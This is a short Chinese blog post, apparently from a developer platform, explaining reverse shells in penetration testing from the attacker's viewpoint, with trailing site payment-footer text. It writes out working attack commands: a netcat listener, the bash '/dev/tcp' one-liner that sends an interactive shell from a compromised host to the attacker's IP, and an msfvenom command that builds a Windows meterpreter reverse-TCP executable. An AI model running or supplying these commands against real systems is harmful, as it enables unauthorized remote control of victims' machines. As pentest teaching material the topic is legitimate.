渗透测试之反弹shell

什么是反弹shell

攻击者想要控制肉鸡,就必须要一个数据传输的通道(TCP/UDP),可以通过ssh或telnet来远程登录来进行操作。这些都是攻击者主动连接肉鸡,如果肉鸡主动连接攻击者实现的shell通道,,就叫反弹shell。

为什么要反弹shell

因为正面不好搞,所以需要反向搞。比如攻击者在肉鸡上上传了一个小马,可能会出现的情况有:
1.肉鸡在局域网内,没有外网地址,连不上。
2.肉鸡有外网地址,但是经常变,不能持续控制它。
3.肉鸡前面有WAF防护,对近来的request请求做了过滤,很难绕过。
那么就可以在肉鸡上启动一个tcpserver,让肉鸡主动连接,由此建立一个数据通道来执行shell。
攻击端执行:

nc -lvp 4100  #启动一个端口为4100的tcpserver

被攻击端执行:

bash -i >& dev/tcp/攻击端ip/4100 0>&1 #反弹shell

bash -i >& /dev/tcp/攻击端ip/4100 0>&1
bash -i 表示启动一个交互式的shell;
>& 这个交互式shell的标准输出和标准错误输出,重定向到这socket上/dev/tcp/攻击端ip/4100,也即发送到/dev/tcp/攻击端ip/4100远端;
0>&1 标准输入重定向到标准输出上;
简而言之,就是启动一个交互式shell,这个交互式shell的输入来自攻击端,输出也到攻击端。

通过bash -i的是最简单但也是最容易被识别的反弹shell,在没有任何防护的机器上执行时没有问题的。
可以用MSF生成的shell。

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.5.32 lport=443 -f exe -o shell.exe
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值